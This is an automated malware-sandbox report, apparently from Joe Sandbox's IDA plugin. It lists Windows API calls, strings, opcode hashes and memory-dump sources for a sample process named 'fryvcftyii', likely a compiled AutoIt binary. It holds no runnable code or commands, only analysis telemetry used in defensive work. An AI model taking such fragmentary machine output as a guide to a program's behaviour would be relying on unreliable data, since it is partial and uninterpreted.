                            • GetMenuItemInfoW.USER32 ref: 004225A3
                            • SetMenuItemInfoW.USER32 ref: 004225D9
                            • Sleep.KERNEL32(000001F4), ref: 004225EB
                            • GetMenuItemCount.USER32(?), ref: 0042262F
                            • GetMenuItemID.USER32(?,00000000), ref: 0042264B
                            • GetMenuItemID.USER32(?,-00000001), ref: 00422675
                            • GetMenuItemID.USER32(?,?), ref: 004226BA
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00422700
                            • GetMenuItemInfoW.USER32 ref: 00422714
                            • SetMenuItemInfoW.USER32 ref: 00422735
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                            • String ID:
                            • API String ID: 4176008265-0
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00416BBF
                            • SafeArrayAllocData.OLEAUT32(?), ref: 00416C18
                            • VariantInit.OLEAUT32(?), ref: 00416C2A
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00416C4A
                            • VariantCopy.OLEAUT32(?,?), ref: 00416C9D
                            • SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00416950), ref: 00416CB1
                            • VariantClear.OLEAUT32(?), ref: 00416CC6
                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00416CD3
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00416CDC
                            • VariantClear.OLEAUT32(?), ref: 00416CEE
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00416CF9
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • GetSystemMetrics.USER32(0000000F), ref: 0044D47C
                            • GetSystemMetrics.USER32(0000000F), ref: 0044D49C
                            • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 0044D6D7
                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0044D6F5
                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0044D716
                            • ShowWindow.USER32(00000003,00000000), ref: 0044D735
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0044D75A
                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0044D77D
                            Strings
                            Similarity
                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                            • String ID: `$
                            • API String ID: 1211466189-74666722
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • CoInitialize.OLE32 ref: 00438403
                            • CoUninitialize.OLE32 ref: 0043840E
                            • CoCreateInstance.OLE32(?,00000000,00000017,00452BEC,?), ref: 0043846E
                            • IIDFromString.OLE32(?,?), ref: 004384E1
                            • VariantInit.OLEAUT32(?), ref: 0043857B
                            • VariantClear.OLEAUT32(?), ref: 004385DC
                            Strings
                            Similarity
                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 834269672-1287834457
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 00435793
                            • inet_addr.WSOCK32(?,?,?), ref: 004357D8
                            • gethostbyname.WSOCK32(?), ref: 004357E4
                            • IcmpCreateFile.IPHLPAPI ref: 004357F2
                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00435862
                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00435878
                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004358ED
                            • WSACleanup.WSOCK32 ref: 004358F3
                            Strings
                            Similarity
                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                            • String ID: Ping
                            • API String ID: 1028309954-2246546115
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0042B4D0
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0042B546
                            • GetLastError.KERNEL32 ref: 0042B550
                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0042B5BD
                            Strings
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00419014
                            • GetDlgCtrlID.USER32 ref: 0041901F
                            • GetParent.USER32 ref: 0041903B
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0041903E
                            • GetDlgCtrlID.USER32 ref: 00419047
                            • GetParent.USER32(?), ref: 00419063
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00419066
                            Strings
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004190FD
                            • GetDlgCtrlID.USER32 ref: 00419108
                            • GetParent.USER32 ref: 00419124
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00419127
                            • GetDlgCtrlID.USER32 ref: 00419130
                            • GetParent.USER32(?), ref: 0041914C
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0041914F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: 8f5c1e9f43654e7f3b188c157bdc9b260699bd59bb96f9f16548602d346fe7fa
                            • Instruction ID: 9ab16b382d7fd9508192e5cf3d2851a91d14d30c64641ccb079bcc8813c9f1cf
                            • Opcode Fuzzy Hash: 8f5c1e9f43654e7f3b188c157bdc9b260699bd59bb96f9f16548602d346fe7fa
                            • Instruction Fuzzy Hash: 7A210A74A01105BBDF01ABA0CC89FFEBB74EF49300F51402AF911D72A1DB795899DB25
                            APIs
                            • GetParent.USER32 ref: 0041916F
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00419184
                            • _wcscmp.LIBCMT ref: 00419196
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00419211
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClassMessageNameParentSend_wcscmp
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 1704125052-3381328864
                            • Opcode ID: b8b78439400c751c152cef179d6bbe1a0258b38488071c59b1bbbe31e7c8407b
                            • Instruction ID: 76ab9af7ef6e23017072bc2a41f96f645f14eeffd4bdcbe3f26ce09827bd92f5
                            • Opcode Fuzzy Hash: b8b78439400c751c152cef179d6bbe1a0258b38488071c59b1bbbe31e7c8407b
                            • Instruction Fuzzy Hash: 7A1159BA288317BAFA112624DC1BEE7379C9B01360B300577FA04B50E1FF796C92599C
                            APIs
                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00427A6C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ArraySafeVartype
                            • String ID:
                            • API String ID: 1725837607-0
                            • Opcode ID: 0cab5c12be43894539f66c963f7b85617d6e0f7852e46c6bb80fe9f5ea15692d
                            • Instruction ID: 4bcc18010657207a62f174ce0f6402b408ad315b76e59d5a1a0160e163ad07fd
                            • Opcode Fuzzy Hash: 0cab5c12be43894539f66c963f7b85617d6e0f7852e46c6bb80fe9f5ea15692d
                            • Instruction Fuzzy Hash: C2B1B171A0422A9FDB01DFA5E885BBFB7B4FF09324F54402AE501EB341D738A941CB99
                            APIs
                            • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00420268,?,00000001), ref: 004211F0
                            • GetForegroundWindow.USER32 ref: 00421204
                            • GetWindowThreadProcessId.USER32(00000000), ref: 0042120B
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0042121A
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0042122C
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00421245
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00421257
                            • AttachThreadInput.USER32(00000000,00000000), ref: 0042129C
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004212B1
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004212BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: 7651b53942e2b498f1357cf3ad6cb42d9b6ceb73704d432da091341dc74cc313
                            • Instruction ID: b444fd9eb89e9c708be6edea87e7b80ab5b37c4f1afe9c7f56ca57c30cd6dcee
                            • Opcode Fuzzy Hash: 7651b53942e2b498f1357cf3ad6cb42d9b6ceb73704d432da091341dc74cc313
                            • Instruction Fuzzy Hash: C6319F75600214FBEB10AF54FC48F6A77A9AB65311F52417AFB00E62A0D7789E40CB69
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003CFAA6
                            • OleUninitialize.OLE32(?,00000000), ref: 003CFB45
                            • UnregisterHotKey.USER32(?), ref: 003CFC9C
                            • DestroyWindow.USER32 ref: 004045D6
                            • FreeLibrary.KERNEL32(?), ref: 0040463B
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00404668
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 469580280-3243417748
                            • Opcode ID: ef71cd65650e90d6eb973c56d0e243c72f3b93117370cea4b14ae50aec3c1e20
                            • Instruction ID: 55fcca5ebcdac835cc6285002417c8265fae10f181dd76137b803083912b3ea9
                            • Opcode Fuzzy Hash: ef71cd65650e90d6eb973c56d0e243c72f3b93117370cea4b14ae50aec3c1e20
                            • Instruction Fuzzy Hash: C3A19A71301212CFCB1AEF10C994F69F365AF45700F1146BEE90AAB2A1DB35AD56CF54
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$_memset
                            • String ID: ,,E$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                            • API String ID: 2862541840-3165839431
                            • Opcode ID: eb4f85e272e90f9015da34f85b47eefbf4942734751feed276f513b524450967
                            • Instruction ID: c64f4b964a96e8d41c5320c392203f13f918a1259e2e806feeb94417a8cf6460
                            • Opcode Fuzzy Hash: eb4f85e272e90f9015da34f85b47eefbf4942734751feed276f513b524450967
                            • Instruction Fuzzy Hash: 3A91AE71A00219ABDF24DFA1C848FAFB7B8EF49710F10855AF915AB280D7B49D45CBA4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ChildEnumWindows
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 3555792229-1603158881
                            • Opcode ID: 818496be7bf06c559657e9b6f8025d2eadec71ed745bfb021d01f9690b523c93
                            • Instruction ID: dbcf69cd32cc03cbccd9b7bc3e27d7acfdfe441046bb4482a1ea152b365a9aeb
                            • Opcode Fuzzy Hash: 818496be7bf06c559657e9b6f8025d2eadec71ed745bfb021d01f9690b523c93
                            • Instruction Fuzzy Hash: 1B91D771A01609AADB09DFA0C441BEEFB74FF04300F54812BD859A7381DF3569EACB99
                            APIs
                            • IsWindow.USER32(00E32460), ref: 0044B3EB
                            • IsWindowEnabled.USER32(00E32460), ref: 0044B3F7
                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0044B4DB
                            • SendMessageW.USER32(00E32460,000000B0,?,?), ref: 0044B512
                            • IsDlgButtonChecked.USER32(?,?,?,?), ref: 0044B54F
                            • GetWindowLongW.USER32(00E32460,000000EC), ref: 0044B571
                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0044B589
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                            • String ID: `$
                            • API String ID: 4072528602-74666722
                            • Opcode ID: de05b3971909b5743a0d57eb54130c05cffa4b96cb89ed5309e9b40065e5f353
                            • Instruction ID: 7aab1e85c54b7b0d0d36799a54c3a5bd6906fe942b4cbd3f86f82867757dc24d
                            • Opcode Fuzzy Hash: de05b3971909b5743a0d57eb54130c05cffa4b96cb89ed5309e9b40065e5f353
                            • Instruction Fuzzy Hash: 5771BF34604604EFFB219F55C890FBBBBB9EF09300F14846AE945973A2C739E851CB99
                            APIs
                            • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 003C2EAE
                              • Part of subcall function 003C1DB3: GetClientRect.USER32(?,?), ref: 003C1DDC
                              • Part of subcall function 003C1DB3: GetWindowRect.USER32(?,?), ref: 003C1E1D
                              • Part of subcall function 003C1DB3: ScreenToClient.USER32(?,?), ref: 003C1E45
                            • GetDC.USER32 ref: 003FCD32
                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003FCD45
                            • SelectObject.GDI32(00000000,00000000), ref: 003FCD53
                            • SelectObject.GDI32(00000000,00000000), ref: 003FCD68
                            • ReleaseDC.USER32(?,00000000), ref: 003FCD70
                            • MoveWindow.USER32(?,?,?,?,?,?), ref: 003FCDFB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                            • String ID: U
                            • API String ID: 4009187628-3372436214
                            • Opcode ID: 57b57383aae00cef1b6033bd192547bc58903b8bfb3fa3063d945e895b4dc255
                            • Instruction ID: 0d4486beb74324ac2faa1340812044cb046775a44551ac708856fc8af6dce99a
                            • Opcode Fuzzy Hash: 57b57383aae00cef1b6033bd192547bc58903b8bfb3fa3063d945e895b4dc255
                            • Instruction Fuzzy Hash: C071B93550020DDFCF229F64C980ABA7BB5FF49320F15527AFE55AA2A6C7308C81DB60
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00431A50
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431A7C
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00431ABE
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00431AD3
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00431AE0
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00431B10
                            • InternetCloseHandle.WININET(00000000), ref: 00431B57
                              • Part of subcall function 00432483: GetLastError.KERNEL32(?,?,00431817,00000000,00000000,00000001), ref: 00432498
                              • Part of subcall function 00432483: SetEvent.KERNEL32(?,?,00431817,00000000,00000000,00000001), ref: 004324AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                            • String ID:
                            • API String ID: 2603140658-3916222277
                            • Opcode ID: be5cfb7412a65d1419c72669ccadd2704bb339a1e4d4daf2bf4df7509fd0a8d8
                            • Instruction ID: 5911d334e9c56b9bfab2b87fba179ad5284ac6077b328a3dc3467e01bf87d41a
                            • Opcode Fuzzy Hash: be5cfb7412a65d1419c72669ccadd2704bb339a1e4d4daf2bf4df7509fd0a8d8
                            • Instruction Fuzzy Hash: 2E4193B1501218BFEB119F50CC85FBB7BACEF09354F00512BFA059A251E7789E448BA8
                            APIs
                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004462EC
                            • GetWindowLongW.USER32(00E32460,000000F0), ref: 0044631F
                            • GetWindowLongW.USER32(00E32460,000000F0), ref: 00446354
                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00446386
                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004463B0
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004463C1
                            • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00449E3C,?,?,?,?), ref: 004463DB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LongWindow$MessageSend
                            • String ID: `$
                            • API String ID: 2178440468-74666722
                            • Opcode ID: 3c047be76a6dc08f249869ae5af68b4ea76b0a9d9c02d59fb9b3315eb57d6287
                            • Instruction ID: 59adba7c445f08eaaf693f40fc2ac462c3324f677ceb608258c45152b059c18e
                            • Opcode Fuzzy Hash: 3c047be76a6dc08f249869ae5af68b4ea76b0a9d9c02d59fb9b3315eb57d6287
                            • Instruction Fuzzy Hash: BD311634640190AFEB20DF19EC84F5937E1FB4A714F1A01BAF9018F2B2CB75AC559B5A
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0044F910), ref: 00438D28
                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0044F910), ref: 00438D5C
                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00438ED6
                            • SysFreeString.OLEAUT32(?), ref: 00438F00
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                            • String ID:
                            • API String ID: 560350794-0
                            • Opcode ID: 318e2e6280b5840058b78a4c77eacc298493cc8af287e65865e3d681fba5ca32
                            • Instruction ID: f385cc27ff70f93f2593e02441e34a828f102f80c64645e093c9ff2c2124fce0
                            • Opcode Fuzzy Hash: 318e2e6280b5840058b78a4c77eacc298493cc8af287e65865e3d681fba5ca32
                            • Instruction Fuzzy Hash: 3AF15871A00209EFCF04DF94C888EAEB7B9FF49314F10849AF905AB251DB75AE46CB54
                            APIs
                            • _memset.LIBCMT ref: 0043F6B5
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043F848
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043F86C
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043F8AC
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043F8CE
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0043FA4A
                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0043FA7C
                            • CloseHandle.KERNEL32(?), ref: 0043FAAB
                            • CloseHandle.KERNEL32(?), ref: 0043FB22
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                            • String ID:
                            • API String ID: 4090791747-0
                            • Opcode ID: 95c176016da8aee42a7b8541362bfee680d5a8956570b59cfd1959ece248a478
                            • Instruction ID: a8fcfaf4e67ae7479254fa91efdee5fd5b8f60dc7e0ee8b2c5cd5b257071d972
                            • Opcode Fuzzy Hash: 95c176016da8aee42a7b8541362bfee680d5a8956570b59cfd1959ece248a478
                            • Instruction Fuzzy Hash: 6EE19E716042419FC715EF25C881B6BBBE1AF89314F14856EF8899F3A1CB34EC49CB56
                            APIs
                              • Part of subcall function 0042466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00423697,?), ref: 0042468B
                              • Part of subcall function 0042466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00423697,?), ref: 004246A4
                              • Part of subcall function 00424A31: GetFileAttributesW.KERNEL32(?,0042370B), ref: 00424A32
                            • lstrcmpiW.KERNEL32(?,?), ref: 00424D40
                            • _wcscmp.LIBCMT ref: 00424D5A
                            • MoveFileW.KERNEL32 ref: 00424D75
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
